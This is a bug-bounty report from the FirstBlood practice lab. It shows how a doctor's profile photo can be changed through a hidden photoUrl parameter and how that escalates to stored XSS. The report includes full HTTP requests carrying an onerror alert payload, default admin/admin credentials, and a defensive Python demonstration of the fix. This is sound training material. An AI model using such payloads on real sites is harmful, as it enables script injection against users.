FirstBlood-#1446[COLLAB] Able to update profile picture of doctor
This issue was discovered on FirstBlood v3



On 2022-12-10, ar6aaz Level 3 reported:

COLLAB: Mr_Xhunt

Hello FirstBlood Team,

I have come across a vulnerability on FirstBloodv3 where I am able to update a doctor's profile picture.

Currently, updating the profile picture is not allowed, but we can update it using the following steps.

Steps to Reproduce:

  1. Log in to FirstBloodv3 using the credentials admin/admin.
  2. Edit a doctor and send that request to Burp Repeater.
  3. In the Repeater tab, change the request method from POST to GET and fuzz for parameters using Param Miner.
  4. It will catch a parameter named photo.
  5. Add the "photo" parameter to the request and check the response; it will ask you to use the "photoUrl" parameter instead.
  6. Change it to the "photoUrl" parameter and add a Burp Collaborator/InteractSH URL. It will ask you to enter a relative URL instead.
  7. Enter the relative URL of another doctor's image. Example: if you are editing doctor3, the edit request should have the relative URL of another doctor: photoUrl=/images/doctor_2.png
  8. Visit https://9f3475d490f7-ar6aaz.a.firstbloodhackers.com/doctors.php

You will see that you are able to edit the profile image of another doctor as well, which is ideally not allowed.

The sample request should look like this:

GET /drpanel/drapi/edit-dr.php?drid=2&name=Shanice&bio=A+board-certified+pediatrician+with+over+8+years+of+experience.+She+received+her+medical+degree+from+the+University+of+Michigan+and+completed+her+residency+at+Children's+Hospital+of+Los+Angeles.+In+her+practice,+she++focuses+on+providing+preventive+care+and+promoting+healthy+habits+in+children+and+teenagers.+She+is+dedicated+to+making+her+patients+feel+comfortable+and+providing+them+with+the+highest+quality+care.&bookable=0&photoUrl=/images/doctor_2.png HTTP/1.1
Host: 9f3475d490f7-ar6aaz.a.firstbloodhackers.com
Cookie: drps=183afa7fd7316bd35b9399184
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://9f3475d490f7-ar6aaz.a.firstbloodhackers.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://9f3475d490f7-ar6aaz.a.firstbloodhackers.com/drpanel/edit-doctor.php?id=2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Updated Images:

This can further be escalated to stored XSS on the endpoint /meet_drs.php. If we enter the payload /"+onerror="alert(document.domain) in photoUrl, it triggers the XSS on /meet_drs.php.

GET request:

GET /drpanel/drapi/edit-dr.php?drid=1&name=Julie&bio=xssA+board-certified+family+medicine+physician+with+over+10+years+of+experience.+She+received+her+medical+degree+from+the+University+of+California,+San+Francisco+and+completed+her+residency+at+Santa+Clara+Valley+Medical+Center.+In+her+practice,+Dr.+Thompson+focuses+on+preventative+care+and+helping+patients+manage+chronic+conditions.+She+is+passionate+about+providing+personalized,+high-quality+care+to+her+patients.&photoUrl=/"+onerror="alert(document.domain)&bookable=0&csrf=_sKf7avp5rxq8Ac2KaW1E HTTP/1.1
Host: 387755f6d078-ar6aaz.a.firstbloodhackers.com
Cookie: drps=7abf2ac65c6ed0113cd39487c
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://387755f6d078-ar6aaz.a.firstbloodhackers.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://387755f6d078-ar6aaz.a.firstbloodhackers.com/drpanel/edit-doctor.php?id=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Stored XSS executing:

P2 High

Endpoint: /drpanel/drapi/edit-dr.php

Parameter: photoUrl

Payload: /images/doctor_2.png


FirstBlood ID: 64
Vulnerability Type: Stored XSS

There is a stored XSS vulnerability on meet_drs.php from the photo of the doctor

FirstBlood ID: 61
Vulnerability Type: Application/Business Logic

It mentions that doctor photos can NOT be modified but it is actually possible to modify them
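
The two findings above (the photoUrl parameter being accepted at all, and its value landing in an img src attribute on meet_drs.php) come down to one weak validation step. The Python script below is an added example, not code from FirstBlood or from the reporter. The page does not show the server-side check or the template, so the "must be a relative URL" check, the unescaped template and the /images/doctor_N.png allow-list pattern are assumptions; the two payload values are copied from the report's requests. It shows why the XSS value passes a "starts with /" check once the query string is decoded ('+' becomes a space), how it breaks out of the quoted src attribute, and how an allow-list check plus attribute-context escaping stop it.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import unquote_plus

# Constructed inputs, copied from the two requests in the report: the benign
# value from the first request and the XSS value exactly as it sits in the
# query string of the second request (still URL-encoded, '+' meaning space).
LEGIT_PHOTO_URL = "/images/doctor_2.png"
XSS_PHOTO_URL_RAW = '/"+onerror="alert(document.domain)'


def decode_query_value(raw: str) -> str:
    """Decode a query-string value the way $_GET would: '+' -> ' ', %XX -> byte."""
    return unquote_plus(raw)


def weak_accepts_photo_url(url: str) -> bool:
    """Assumed reconstruction of the server's check (the report only shows
    that absolute URLs are refused with 'use a relative URL'): anything
    beginning with '/' is treated as a relative path and stored verbatim."""
    return url.startswith("/")


# Hardened check: allow-list the exact path shape the application uses for
# doctor photos. The pattern is an assumption based on /images/doctor_2.png.
DOCTOR_PHOTO_RE = re.compile(r"/images/doctor_\d+\.png")


def strict_accepts_photo_url(url: str) -> bool:
    """Reject anything that is not exactly an existing-style photo path."""
    return DOCTOR_PHOTO_RE.fullmatch(url) is not None


def render_unescaped(url: str) -> str:
    """Assumed vulnerable template: the stored value is interpolated straight
    into the src attribute, which is what the stored XSS on meet_drs.php implies."""
    return f'<img src="{url}" class="doctor-photo">'


def render_escaped(url: str) -> str:
    """Hardened template: escape for the HTML attribute context (quote=True
    turns '"' into &quot; so the value cannot close the attribute)."""
    return f'<img src="{html.escape(url, quote=True)}" class="doctor-photo">'


class _ImgAttrs(HTMLParser):
    """Collects the attributes a browser would see on the first <img> tag."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        if tag == "img" and not self.attrs:
            self.attrs = dict(attrs)


def img_attributes(fragment: str) -> dict:
    """Parse a fragment and return the <img> attributes as a dict; an
    'onerror' key means the value broke out of src and added a handler."""
    parser = _ImgAttrs()
    parser.feed(fragment)
    parser.close()
    return parser.attrs


def evaluate(raw_value: str, strict: bool) -> dict:
    """Run one photoUrl value through either the weak or the hardened path
    and report whether it was stored and whether the rendered tag gained a handler."""
    value = decode_query_value(raw_value)
    accepted = strict_accepts_photo_url(value) if strict else weak_accepts_photo_url(value)
    if not accepted:
        return {"value": value, "stored": False, "handler_injected": False}
    rendered = render_escaped(value) if strict else render_unescaped(value)
    return {
        "value": value,
        "stored": True,
        "rendered": rendered,
        "handler_injected": "onerror" in img_attributes(rendered),
    }


if __name__ == "__main__":
    for raw in (LEGIT_PHOTO_URL, XSS_PHOTO_URL_RAW):
        for strict in (False, True):
            print("strict" if strict else "weak  ", evaluate(raw, strict))
```

The weak path stores /" onerror="alert(document.domain) and renders an img tag whose parsed attributes include onerror, which is the stored XSS (FirstBlood ID 64). The strict path rejects it, and even if the value had been stored the escaped render keeps it inside src. Both checks are secondary to the business-logic fix for ID 61: an edit handler that is not supposed to change photos should ignore the parameter entirely rather than validate it, and a GET request should not update anything.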

Report Feedback

@zseano

Creator & Administrator


Congratulations, you were the third to discover XSS via the photo parameter on meet_drs.php! As this is a collaboration report, the bounty has been split evenly.